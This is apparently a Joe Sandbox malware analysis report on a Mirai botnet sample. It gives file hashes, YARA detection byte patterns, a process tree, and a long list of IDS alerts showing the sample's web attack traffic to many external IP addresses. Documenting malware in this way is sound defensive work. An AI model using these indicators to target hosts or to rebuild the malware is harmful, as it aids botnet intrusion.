Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86.elf

Overview

General Information

Sample name:x86.elf
Analysis ID:1567853
MD5:6270c32abec4811eac225d85d0970fac
SHA1:7fd15114c7ecdd3a0322263794846196c2e40e5d
SHA256:b107d6730941c0090b2c61cf0a1ecdbd8d7f58d941c46c6d28120a7c14e6e16c
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1567853
Start date and time:2024-12-03 23:01:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@25/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: x86.elf
Command:/tmp/x86.elf
PID:6220
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • x86.elf (PID: 6220, Parent: 6140, MD5: 6270c32abec4811eac225d85d0970fac) Arguments: /tmp/x86.elf
    • x86.elf New Fork (PID: 6221, Parent: 6220)
      • x86.elf New Fork (PID: 6222, Parent: 6221)
      • x86.elf New Fork (PID: 6223, Parent: 6221)
      • x86.elf New Fork (PID: 6224, Parent: 6221)
      • x86.elf New Fork (PID: 6226, Parent: 6221)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86.elfLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      x86.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x55f0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      x86.elfLinux_Trojan_Mirai_93fc3657unknownunknown
      • 0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
      Click to see the 9 entries
      SourceRuleDescriptionAuthorStrings
      6220.1.0000000008048000.0000000008058000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6220.1.0000000008048000.0000000008058000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6220.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_fa3ad9d0unknownunknown
          • 0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
          6220.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
          • 0x55f0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
          6220.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_93fc3657unknownunknown
          • 0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
          Click to see the 25 entries
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-03T23:02:00.526356+010020300921Web Application Attack192.168.2.2350942149.51.174.9080TCP
          2024-12-03T23:02:03.885751+010020300921Web Application Attack192.168.2.233386672.27.41.15580TCP
          2024-12-03T23:02:08.576439+010020300921Web Application Attack192.168.2.235961878.83.13.7080TCP
          2024-12-03T23:02:11.878430+010020300921Web Application Attack192.168.2.23571921.57.198.1680TCP
          2024-12-03T23:02:11.909341+010020300921Web Application Attack192.168.2.2349548144.233.250.21880TCP
          2024-12-03T23:02:11.962917+010020300921Web Application Attack192.168.2.2335186135.15.7.16380TCP
          2024-12-03T23:02:12.761427+010020300921Web Application Attack192.168.2.2355322151.59.53.20780TCP
          2024-12-03T23:02:12.822012+010020300921Web Application Attack192.168.2.2341578184.47.95.23880TCP
          2024-12-03T23:02:12.837635+010020300921Web Application Attack192.168.2.235701275.244.175.4080TCP
          2024-12-03T23:02:12.838140+010020300921Web Application Attack192.168.2.2333014124.90.254.680TCP
          2024-12-03T23:02:12.838142+010020300921Web Application Attack192.168.2.234823892.205.42.24980TCP
          2024-12-03T23:02:12.853137+010020300921Web Application Attack192.168.2.2340858184.220.227.7780TCP
          2024-12-03T23:02:12.853681+010020300921Web Application Attack192.168.2.233326460.164.109.20380TCP
          2024-12-03T23:02:12.877983+010020300921Web Application Attack192.168.2.2354432158.67.27.13180TCP
          2024-12-03T23:02:12.884309+010020300921Web Application Attack192.168.2.2344122124.180.100.20880TCP
          2024-12-03T23:02:12.899948+010020300921Web Application Attack192.168.2.2344190112.16.175.4180TCP
          2024-12-03T23:02:12.909349+010020300921Web Application Attack192.168.2.2357712212.110.217.7580TCP
          2024-12-03T23:02:12.909383+010020300921Web Application Attack192.168.2.2356846203.53.63.11580TCP
          2024-12-03T23:02:12.909667+010020300921Web Application Attack192.168.2.234659279.149.81.19780TCP
          2024-12-03T23:02:12.909761+010020300921Web Application Attack192.168.2.2337830165.207.12.11780TCP
          2024-12-03T23:02:13.931392+010020300921Web Application Attack192.168.2.235915682.120.56.1080TCP
          2024-12-03T23:02:13.946792+010020300921Web Application Attack192.168.2.2336418208.239.12.18980TCP
          2024-12-03T23:02:13.946881+010020300921Web Application Attack192.168.2.2343232164.63.62.18080TCP
          2024-12-03T23:02:13.978247+010020300921Web Application Attack192.168.2.2359542205.244.238.9280TCP
          2024-12-03T23:02:13.978276+010020300921Web Application Attack192.168.2.235193264.182.50.2880TCP
          2024-12-03T23:02:13.987428+010020300921Web Application Attack192.168.2.2345350143.150.243.10180TCP
          2024-12-03T23:02:13.987706+010020300921Web Application Attack192.168.2.234281673.36.157.5380TCP
          2024-12-03T23:02:13.987842+010020300921Web Application Attack192.168.2.2360278123.52.192.12380TCP
          2024-12-03T23:02:13.988011+010020300921Web Application Attack192.168.2.2342460146.63.138.24680TCP
          2024-12-03T23:02:13.988187+010020300921Web Application Attack192.168.2.2359862111.235.227.10380TCP
          2024-12-03T23:02:13.988288+010020300921Web Application Attack192.168.2.233585481.114.132.6480TCP
          2024-12-03T23:02:14.003444+010020300921Web Application Attack192.168.2.2359076177.233.205.20180TCP
          2024-12-03T23:02:14.039874+010020300921Web Application Attack192.168.2.2337200198.53.211.16780TCP
          2024-12-03T23:02:14.040079+010020300921Web Application Attack192.168.2.233943868.184.62.24980TCP
          2024-12-03T23:02:14.040205+010020300921Web Application Attack192.168.2.235368850.151.21.880TCP
          2024-12-03T23:02:16.915736+010020300921Web Application Attack192.168.2.2342998184.145.222.8880TCP
          2024-12-03T23:02:16.931396+010020300921Web Application Attack192.168.2.235966040.208.105.23580TCP
          2024-12-03T23:02:16.931589+010020300921Web Application Attack192.168.2.233867057.16.75.1880TCP
          2024-12-03T23:02:16.962493+010020300921Web Application Attack192.168.2.2352416140.3.1.8280TCP
          2024-12-03T23:02:16.978015+010020300921Web Application Attack192.168.2.2332814219.81.41.17380TCP
          2024-12-03T23:02:17.151827+010020300921Web Application Attack192.168.2.236072661.110.206.2180TCP
          2024-12-03T23:02:17.174881+010020300921Web Application Attack192.168.2.2348142152.212.240.18880TCP
          2024-12-03T23:02:17.197377+010020300921Web Application Attack192.168.2.2333208173.72.159.11180TCP
          2024-12-03T23:02:17.197580+010020300921Web Application Attack192.168.2.2354382198.165.232.5280TCP
          2024-12-03T23:02:17.197641+010020300921Web Application Attack192.168.2.2358878109.62.119.780TCP
          2024-12-03T23:02:17.206393+010020300921Web Application Attack192.168.2.2349510173.230.32.4680TCP
          2024-12-03T23:02:17.206500+010020300921Web Application Attack192.168.2.2350164102.137.240.13480TCP
          2024-12-03T23:02:17.237570+010020300921Web Application Attack192.168.2.2336248201.125.207.17180TCP
          2024-12-03T23:02:17.253134+010020300921Web Application Attack192.168.2.2345998153.78.233.7980TCP
          2024-12-03T23:02:17.275064+010020300921Web Application Attack192.168.2.233556678.65.198.15080TCP
          2024-12-03T23:02:17.290619+010020300921Web Application Attack192.168.2.23556308.255.164.12880TCP
          2024-12-03T23:02:17.306364+010020300921Web Application Attack192.168.2.2352372175.75.70.5480TCP
          2024-12-03T23:02:17.315466+010020300921Web Application Attack192.168.2.2348998176.1.7.980TCP
          2024-12-03T23:02:17.315648+010020300921Web Application Attack192.168.2.2349178124.224.219.16880TCP
          2024-12-03T23:02:17.315809+010020300921Web Application Attack192.168.2.2357802137.224.169.14180TCP
          2024-12-03T23:02:17.321804+010020300921Web Application Attack192.168.2.2354236208.132.145.17980TCP
          2024-12-03T23:02:17.331101+010020300921Web Application Attack192.168.2.2337594159.108.60.22680TCP
          2024-12-03T23:02:17.331226+010020300921Web Application Attack192.168.2.2340114212.53.111.20880TCP
          2024-12-03T23:02:17.363064+010020300921Web Application Attack192.168.2.233555885.42.189.13780TCP
          2024-12-03T23:02:17.363187+010020300921Web Application Attack192.168.2.2356716173.230.39.23580TCP
          2024-12-03T23:02:17.378073+010020300921Web Application Attack192.168.2.2359728105.172.5.16880TCP
          2024-12-03T23:02:18.132988+010020300921Web Application Attack192.168.2.2345092163.172.255.11880TCP
          2024-12-03T23:02:18.185218+010020300921Web Application Attack192.168.2.234969668.152.141.25180TCP
          2024-12-03T23:02:18.197973+010020300921Web Application Attack192.168.2.2339326117.50.49.12580TCP
          2024-12-03T23:02:18.198194+010020300921Web Application Attack192.168.2.233419025.167.5.21480TCP
          2024-12-03T23:02:18.198269+010020300921Web Application Attack192.168.2.2335602144.147.255.22180TCP
          2024-12-03T23:02:18.198354+010020300921Web Application Attack192.168.2.2353000203.176.98.17880TCP
          2024-12-03T23:02:18.206712+010020300921Web Application Attack192.168.2.2345984141.145.232.22980TCP
          2024-12-03T23:02:18.206899+010020300921Web Application Attack192.168.2.2356908158.79.170.5880TCP
          2024-12-03T23:02:18.207666+010020300921Web Application Attack192.168.2.2347508164.21.186.7280TCP
          2024-12-03T23:02:18.431348+010020300921Web Application Attack192.168.2.2338986223.91.116.7580TCP
          2024-12-03T23:02:18.456574+010020300921Web Application Attack192.168.2.236035250.162.207.4380TCP
          2024-12-03T23:02:18.487562+010020300921Web Application Attack192.168.2.2347664204.186.97.16580TCP
          2024-12-03T23:02:18.534336+010020300921Web Application Attack192.168.2.235379272.71.46.2380TCP
          2024-12-03T23:02:19.207436+010020300921Web Application Attack192.168.2.2352296209.173.84.4880TCP
          2024-12-03T23:02:19.431410+010020300921Web Application Attack192.168.2.2360336207.211.198.1680TCP
          2024-12-03T23:02:19.431575+010020300921Web Application Attack192.168.2.2335728206.102.146.5780TCP
          2024-12-03T23:02:19.450445+010020300921Web Application Attack192.168.2.2352144149.156.227.5180TCP
          2024-12-03T23:02:19.450450+010020300921Web Application Attack192.168.2.2359710121.249.204.7380TCP
          2024-12-03T23:02:19.462673+010020300921Web Application Attack192.168.2.2346176173.126.146.7580TCP
          2024-12-03T23:02:19.478249+010020300921Web Application Attack192.168.2.2348550128.223.79.23680TCP
          2024-12-03T23:02:20.493843+010020300921Web Application Attack192.168.2.234765025.10.197.17480TCP
          2024-12-03T23:02:20.534868+010020300921Web Application Attack192.168.2.2334980217.200.202.10180TCP
          2024-12-03T23:02:20.535033+010020300921Web Application Attack192.168.2.233807469.189.168.7780TCP
          2024-12-03T23:02:20.572308+010020300921Web Application Attack192.168.2.2337732131.122.230.580TCP
          2024-12-03T23:02:20.572342+010020300921Web Application Attack192.168.2.2334218174.54.4.580TCP
          2024-12-03T23:02:20.597030+010020300921Web Application Attack192.168.2.235286898.112.149.20480TCP
          2024-12-03T23:02:20.619725+010020300921Web Application Attack192.168.2.2347178166.78.173.11680TCP
          2024-12-03T23:02:20.621014+010020300921Web Application Attack192.168.2.2356348170.169.198.7180TCP
          2024-12-03T23:02:20.675228+010020300921Web Application Attack192.168.2.2337954210.121.128.4680TCP
          2024-12-03T23:02:21.650481+010020300921Web Application Attack192.168.2.2344554143.74.7.1680TCP
          2024-12-03T23:02:21.659546+010020300921Web Application Attack192.168.2.235606013.251.158.6580TCP
          2024-12-03T23:02:21.675514+010020300921Web Application Attack192.168.2.233490865.92.219.1580TCP
          2024-12-03T23:02:21.822140+010020300921Web Application Attack192.168.2.2355196199.52.65.1180TCP
          2024-12-03T23:02:21.822342+010020300921Web Application Attack192.168.2.2336620207.42.102.16280TCP
          2024-12-03T23:02:21.831349+010020300921Web Application Attack192.168.2.233409893.111.230.10280TCP
          2024-12-03T23:02:21.848879+010020300921Web Application Attack192.168.2.235510250.206.223.17080TCP
          2024-12-03T23:02:21.878154+010020300921Web Application Attack192.168.2.2340278176.0.211.14380TCP
          2024-12-03T23:02:21.878403+010020300921Web Application Attack192.168.2.233702258.165.207.16680TCP
          2024-12-03T23:02:22.478471+010020300921Web Application Attack192.168.2.2341306126.82.92.6580TCP
          2024-12-03T23:02:22.478574+010020300921Web Application Attack192.168.2.235174660.161.100.7880TCP
          2024-12-03T23:02:22.494057+010020300921Web Application Attack192.168.2.2337636208.48.134.7280TCP
          2024-12-03T23:02:22.503362+010020300921Web Application Attack192.168.2.2334032119.237.14.23480TCP
          2024-12-03T23:02:22.509479+010020300921Web Application Attack192.168.2.235372449.191.180.5080TCP
          2024-12-03T23:02:22.518805+010020300921Web Application Attack192.168.2.235644850.215.179.24680TCP
          2024-12-03T23:02:22.518873+010020300921Web Application Attack192.168.2.235723632.44.232.3980TCP
          2024-12-03T23:02:22.525108+010020300921Web Application Attack192.168.2.2344896155.90.17.17080TCP
          2024-12-03T23:02:22.534520+010020300921Web Application Attack192.168.2.235548283.106.224.1880TCP
          2024-12-03T23:02:22.534655+010020300921Web Application Attack192.168.2.2336026122.22.64.4180TCP
          2024-12-03T23:02:22.534738+010020300921Web Application Attack192.168.2.2354516110.32.215.18480TCP
          2024-12-03T23:02:22.744418+010020300921Web Application Attack192.168.2.2350054217.215.79.6180TCP
          2024-12-03T23:02:22.775318+010020300921Web Application Attack192.168.2.23406342.117.9.23580TCP
          2024-12-03T23:02:22.775554+010020300921Web Application Attack192.168.2.2358554133.146.239.2580TCP
          2024-12-03T23:02:22.784562+010020300921Web Application Attack192.168.2.2348358128.79.224.16280TCP
          2024-12-03T23:02:22.784696+010020300921Web Application Attack192.168.2.2352108147.230.188.10080TCP
          2024-12-03T23:02:22.800107+010020300921Web Application Attack192.168.2.2332836208.73.48.6680TCP
          2024-12-03T23:02:22.822241+010020300921Web Application Attack192.168.2.2338966113.124.149.12680TCP
          2024-12-03T23:02:22.822258+010020300921Web Application Attack192.168.2.2350560165.33.196.7580TCP
          2024-12-03T23:02:22.831194+010020300921Web Application Attack192.168.2.2334206199.103.66.4480TCP
          2024-12-03T23:02:22.831330+010020300921Web Application Attack192.168.2.2345228173.121.214.13080TCP
          2024-12-03T23:02:22.831421+010020300921Web Application Attack192.168.2.2356662194.1.252.180TCP
          2024-12-03T23:02:22.865032+010020300921Web Application Attack192.168.2.234225878.227.173.20280TCP
          2024-12-03T23:02:22.884728+010020300921Web Application Attack192.168.2.235743650.205.67.10380TCP
          2024-12-03T23:02:22.900105+010020300921Web Application Attack192.168.2.2334550101.32.81.23580TCP
          2024-12-03T23:02:22.947321+010020300921Web Application Attack192.168.2.2351722192.140.240.2780TCP
          2024-12-03T23:02:22.956493+010020300921Web Application Attack192.168.2.2338628131.249.228.8080TCP
          2024-12-03T23:02:22.971923+010020300921Web Application Attack192.168.2.2335456133.207.20.23480TCP
          2024-12-03T23:02:22.972078+010020300921Web Application Attack192.168.2.2359898223.66.174.2480TCP
          2024-12-03T23:02:23.697212+010020300921Web Application Attack192.168.2.233512480.159.50.23180TCP
          2024-12-03T23:02:23.697447+010020300921Web Application Attack192.168.2.2333260200.230.245.16880TCP
          2024-12-03T23:02:23.706395+010020300921Web Application Attack192.168.2.2343854131.130.228.10580TCP
          2024-12-03T23:02:23.759890+010020300921Web Application Attack192.168.2.2337090125.167.185.180TCP
          2024-12-03T23:02:23.759894+010020300921Web Application Attack192.168.2.2333554208.46.118.21380TCP
          2024-12-03T23:02:23.759904+010020300921Web Application Attack192.168.2.2348102210.246.226.21880TCP
          2024-12-03T23:02:23.775456+010020300921Web Application Attack192.168.2.2339734148.179.123.6580TCP
          2024-12-03T23:02:23.831514+010020300921Web Application Attack192.168.2.233757071.223.65.6980TCP
          2024-12-03T23:02:23.846928+010020300921Web Application Attack192.168.2.235087897.197.44.17480TCP
          2024-12-03T23:02:24.776343+010020300921Web Application Attack192.168.2.235106846.102.189.21380TCP
          2024-12-03T23:02:24.776354+010020300921Web Application Attack192.168.2.235932668.241.111.7380TCP
          2024-12-03T23:02:24.791765+010020300921Web Application Attack192.168.2.235903491.25.207.21280TCP
          2024-12-03T23:02:24.806577+010020300921Web Application Attack192.168.2.233583462.81.97.7180TCP
          2024-12-03T23:02:24.815854+010020300921Web Application Attack192.168.2.2359008210.235.160.6080TCP
          2024-12-03T23:02:24.822167+010020300921Web Application Attack192.168.2.2333366168.40.98.6680TCP
          2024-12-03T23:02:24.822262+010020300921Web Application Attack192.168.2.2350504183.72.35.24180TCP
          2024-12-03T23:02:24.822333+010020300921Web Application Attack192.168.2.23586529.244.198.2480TCP
          2024-12-03T23:02:24.822439+010020300921Web Application Attack192.168.2.2336486207.6.103.7380TCP
          2024-12-03T23:02:24.822535+010020300921Web Application Attack192.168.2.2335888186.91.189.15480TCP
          2024-12-03T23:02:24.822715+010020300921Web Application Attack192.168.2.233297662.140.60.24780TCP
          2024-12-03T23:02:24.822846+010020300921Web Application Attack192.168.2.2355418194.136.29.12980TCP
          2024-12-03T23:02:24.823026+010020300921Web Application Attack192.168.2.2343092103.233.244.3380TCP
          2024-12-03T23:02:24.831249+010020300921Web Application Attack192.168.2.2334780115.232.232.11280TCP
          2024-12-03T23:02:24.831424+010020300921Web Application Attack192.168.2.234580067.200.144.19180TCP
          2024-12-03T23:02:24.831601+010020300921Web Application Attack192.168.2.2345034110.127.114.23280TCP
          2024-12-03T23:02:24.831727+010020300921Web Application Attack192.168.2.235556249.174.199.23080TCP
          2024-12-03T23:02:24.831858+010020300921Web Application Attack192.168.2.236021677.229.189.17780TCP
          2024-12-03T23:02:24.837592+010020300921Web Application Attack192.168.2.2343906154.12.222.9980TCP
          2024-12-03T23:02:24.837830+010020300921Web Application Attack192.168.2.234394482.36.75.21780TCP
          2024-12-03T23:02:24.847149+010020300921Web Application Attack192.168.2.2336900166.87.180.3080TCP
          2024-12-03T23:02:24.947292+010020300921Web Application Attack192.168.2.2332922192.71.11.23280TCP
          2024-12-03T23:02:25.276090+010020300921Web Application Attack192.168.2.234110857.128.103.18380TCP
          2024-12-03T23:02:25.356075+010020300921Web Application Attack192.168.2.2356260187.32.72.15380TCP
          2024-12-03T23:02:25.931444+010020300921Web Application Attack192.168.2.235339037.38.112.10580TCP
          2024-12-03T23:02:25.931562+010020300921Web Application Attack192.168.2.2342038133.63.128.15280TCP
          2024-12-03T23:02:25.931849+010020300921Web Application Attack192.168.2.2349984172.129.180.8980TCP
          2024-12-03T23:02:25.931892+010020300921Web Application Attack192.168.2.233963851.202.147.13480TCP
          2024-12-03T23:02:25.931922+010020300921Web Application Attack192.168.2.235328249.241.24.10680TCP
          2024-12-03T23:02:25.947650+010020300921Web Application Attack192.168.2.2346292211.247.224.21180TCP
          2024-12-03T23:02:25.947711+010020300921Web Application Attack192.168.2.2332950203.233.83.22780TCP
          2024-12-03T23:02:25.947790+010020300921Web Application Attack192.168.2.2351518145.255.225.14280TCP
          2024-12-03T23:02:25.947941+010020300921Web Application Attack192.168.2.234317673.84.140.19080TCP
          2024-12-03T23:02:25.947959+010020300921Web Application Attack192.168.2.235719454.125.50.11180TCP
          2024-12-03T23:02:25.956594+010020300921Web Application Attack192.168.2.233619871.107.70.5880TCP
          2024-12-03T23:02:25.956691+010020300921Web Application Attack192.168.2.2354090177.240.197.15880TCP
          2024-12-03T23:02:25.956907+010020300921Web Application Attack192.168.2.2350942137.150.89.23280TCP
          2024-12-03T23:02:25.962678+010020300921Web Application Attack192.168.2.2359728157.144.82.4480TCP
          2024-12-03T23:02:25.962765+010020300921Web Application Attack192.168.2.2356432126.89.116.14980TCP
          2024-12-03T23:02:25.972035+010020300921Web Application Attack192.168.2.233362089.128.150.9280TCP
          2024-12-03T23:02:25.978415+010020300921Web Application Attack192.168.2.233905462.206.122.11280TCP
          2024-12-03T23:02:25.978544+010020300921Web Application Attack192.168.2.234657277.166.16.19380TCP
          2024-12-03T23:02:26.003421+010020300921Web Application Attack192.168.2.235744462.205.39.10980TCP
          2024-12-03T23:02:26.003538+010020300921Web Application Attack192.168.2.2335468165.237.166.8480TCP
          2024-12-03T23:02:26.009593+010020300921Web Application Attack192.168.2.234178670.228.253.24080TCP
          2024-12-03T23:02:26.018855+010020300921Web Application Attack192.168.2.2333240141.175.5.22380TCP
          2024-12-03T23:02:26.197281+010020300921Web Application Attack192.168.2.2344038185.51.90.9880TCP
          2024-12-03T23:02:26.228604+010020300921Web Application Attack192.168.2.2360564174.237.64.8880TCP
          2024-12-03T23:02:26.228730+010020300921Web Application Attack192.168.2.233951440.10.15.1180TCP
          2024-12-03T23:02:26.253165+010020300921Web Application Attack192.168.2.233724857.202.180.18380TCP
          2024-12-03T23:02:26.790884+010020300921Web Application Attack192.168.2.2353768191.228.54.5380TCP
          2024-12-03T23:02:26.806691+010020300921Web Application Attack192.168.2.2336828110.44.250.8280TCP
          2024-12-03T23:02:26.822745+010020300921Web Application Attack192.168.2.2347880210.1.89.25580TCP
          2024-12-03T23:02:26.831922+010020300921Web Application Attack192.168.2.2356370196.190.48.12680TCP
          2024-12-03T23:02:26.832077+010020300921Web Application Attack192.168.2.2353562204.240.175.5280TCP
          2024-12-03T23:02:27.134788+010020300921Web Application Attack192.168.2.2359386159.125.18.580TCP
          2024-12-03T23:02:27.197385+010020300921Web Application Attack192.168.2.235561090.244.204.6280TCP
          2024-12-03T23:02:27.197458+010020300921Web Application Attack192.168.2.235785657.249.135.16780TCP
          2024-12-03T23:02:27.206585+010020300921Web Application Attack192.168.2.2336856130.92.189.10880TCP
          2024-12-03T23:02:27.213008+010020300921Web Application Attack192.168.2.234567088.214.253.3080TCP
          2024-12-03T23:02:27.253450+010020300921Web Application Attack192.168.2.2342192157.75.188.16780TCP
          2024-12-03T23:02:28.197382+010020300921Web Application Attack192.168.2.23605629.170.53.21180TCP
          2024-12-03T23:02:28.268927+010020300921Web Application Attack192.168.2.235417499.6.29.12580TCP
          2024-12-03T23:02:28.275513+010020300921Web Application Attack192.168.2.235621442.101.107.7880TCP
          2024-12-03T23:02:28.284998+010020300921Web Application Attack192.168.2.2355298167.195.228.18580TCP
          2024-12-03T23:02:28.300212+010020300921Web Application Attack192.168.2.234118458.181.107.13180TCP
          2024-12-03T23:02:28.322362+010020300921Web Application Attack192.168.2.2338620124.240.76.13080TCP
          2024-12-03T23:02:28.322571+010020300921Web Application Attack192.168.2.235521697.131.151.13480TCP
          2024-12-03T23:02:28.362878+010020300921Web Application Attack192.168.2.2340682146.78.192.10280TCP
          2024-12-03T23:02:28.369027+010020300921Web Application Attack192.168.2.2357846218.160.198.6880TCP
          2024-12-03T23:02:28.409563+010020300921Web Application Attack192.168.2.2333040130.195.228.12480TCP
          2024-12-03T23:02:28.409695+010020300921Web Application Attack192.168.2.2355690212.164.197.4580TCP
          2024-12-03T23:02:28.763576+010020300921Web Application Attack192.168.2.234306645.203.146.19680TCP
          2024-12-03T23:02:29.087693+010020300921Web Application Attack192.168.2.2343062100.47.39.6480TCP
          2024-12-03T23:02:29.097175+010020300921Web Application Attack192.168.2.235372243.37.19.6680TCP
          2024-12-03T23:02:29.119183+010020300921Web Application Attack192.168.2.2345968118.88.160.20580TCP
          2024-12-03T23:02:29.119253+010020300921Web Application Attack192.168.2.235441657.9.56.3080TCP
          2024-12-03T23:02:29.145017+010020300921Web Application Attack192.168.2.2346584195.194.204.14580TCP
          2024-12-03T23:02:29.158908+010020300921Web Application Attack192.168.2.2355514120.51.53.21280TCP
          2024-12-03T23:02:29.495197+010020300921Web Application Attack192.168.2.2340606120.96.167.780TCP
          2024-12-03T23:02:29.526313+010020300921Web Application Attack192.168.2.2350792220.24.222.24780TCP
          2024-12-03T23:02:29.526338+010020300921Web Application Attack192.168.2.2359450122.191.41.17680TCP
          2024-12-03T23:02:29.535319+010020300921Web Application Attack192.168.2.233544293.210.77.24980TCP
          2024-12-03T23:02:29.535483+010020300921Web Application Attack192.168.2.234656047.31.48.9580TCP
          2024-12-03T23:02:29.566709+010020300921Web Application Attack192.168.2.235998692.182.109.13480TCP
          2024-12-03T23:02:29.566730+010020300921Web Application Attack192.168.2.2352042205.62.181.15080TCP
          2024-12-03T23:02:30.244257+010020300921Web Application Attack192.168.2.2336762181.2.206.15480TCP
          2024-12-03T23:02:30.244470+010020300921Web Application Attack192.168.2.2335140161.104.243.11880TCP
          2024-12-03T23:02:30.253339+010020300921Web Application Attack192.168.2.2350694135.50.4.17980TCP
          2024-12-03T23:02:30.284813+010020300921Web Application Attack192.168.2.2338924208.102.194.8080TCP
          2024-12-03T23:02:30.284816+010020300921Web Application Attack192.168.2.2348718131.216.31.15280TCP
          2024-12-03T23:02:30.775320+010020300921Web Application Attack192.168.2.2357744179.176.136.21780TCP
          2024-12-03T23:02:30.775420+010020300921Web Application Attack192.168.2.2341870178.26.134.8780TCP
          2024-12-03T23:02:30.816306+010020300921Web Application Attack192.168.2.2341808192.62.28.15480TCP
          2024-12-03T23:02:30.816309+010020300921Web Application Attack192.168.2.2352688207.214.255.1580TCP
          2024-12-03T23:02:30.831402+010020300921Web Application Attack192.168.2.2345936208.122.104.12980TCP
          2024-12-03T23:02:31.384783+010020300921Web Application Attack192.168.2.2336564130.15.156.10180TCP
          2024-12-03T23:02:31.409655+010020300921Web Application Attack192.168.2.2336694196.4.107.3480TCP
          2024-12-03T23:02:31.409841+010020300921Web Application Attack192.168.2.2343436173.19.150.14580TCP
          2024-12-03T23:02:31.431854+010020300921Web Application Attack192.168.2.2359218149.144.220.12280TCP
          2024-12-03T23:02:31.456563+010020300921Web Application Attack192.168.2.2333606168.205.155.8780TCP
          2024-12-03T23:02:31.565866+010020300921Web Application Attack192.168.2.235510661.251.115.9580TCP
          2024-12-03T23:02:31.565876+010020300921Web Application Attack192.168.2.234965072.104.229.580TCP
          2024-12-03T23:02:31.566082+010020300921Web Application Attack192.168.2.2335586153.41.160.1980TCP
          2024-12-03T23:02:31.572314+010020300921Web Application Attack192.168.2.2340006197.221.243.18680TCP
          2024-12-03T23:02:31.572470+010020300921Web Application Attack192.168.2.23409061.99.148.15280TCP
          2024-12-03T23:02:31.572575+010020300921Web Application Attack192.168.2.2345718108.245.0.4780TCP
          2024-12-03T23:02:31.582000+010020300921Web Application Attack192.168.2.233895857.17.247.4880TCP
          2024-12-03T23:02:32.525542+010020300921Web Application Attack192.168.2.2355664220.202.214.7380TCP
          2024-12-03T23:02:32.572282+010020300921Web Application Attack192.168.2.2354930119.229.42.4380TCP
          2024-12-03T23:02:32.572286+010020300921Web Application Attack192.168.2.2355488135.106.99.2980TCP
          2024-12-03T23:02:32.572379+010020300921Web Application Attack192.168.2.2355326208.23.123.18480TCP
          2024-12-03T23:02:32.597376+010020300921Web Application Attack192.168.2.2338294142.129.100.22380TCP
          2024-12-03T23:02:33.775493+010020300921Web Application Attack192.168.2.2357452122.238.169.22480TCP
          2024-12-03T23:02:33.822326+010020300921Web Application Attack192.168.2.2354742192.24.226.13780TCP
          2024-12-03T23:02:33.822495+010020300921Web Application Attack192.168.2.2359844189.161.132.8980TCP
          2024-12-03T23:02:33.831582+010020300921Web Application Attack192.168.2.2352202160.86.170.8880TCP
          2024-12-03T23:02:33.853654+010020300921Web Application Attack192.168.2.2360772116.227.243.10080TCP
          2024-12-03T23:02:33.853756+010020300921Web Application Attack192.168.2.235647041.247.11.23480TCP
          2024-12-03T23:02:33.863286+010020300921Web Application Attack192.168.2.2360118132.193.129.16680TCP
          2024-12-03T23:02:33.878990+010020300921Web Application Attack192.168.2.2338302124.201.144.16780TCP
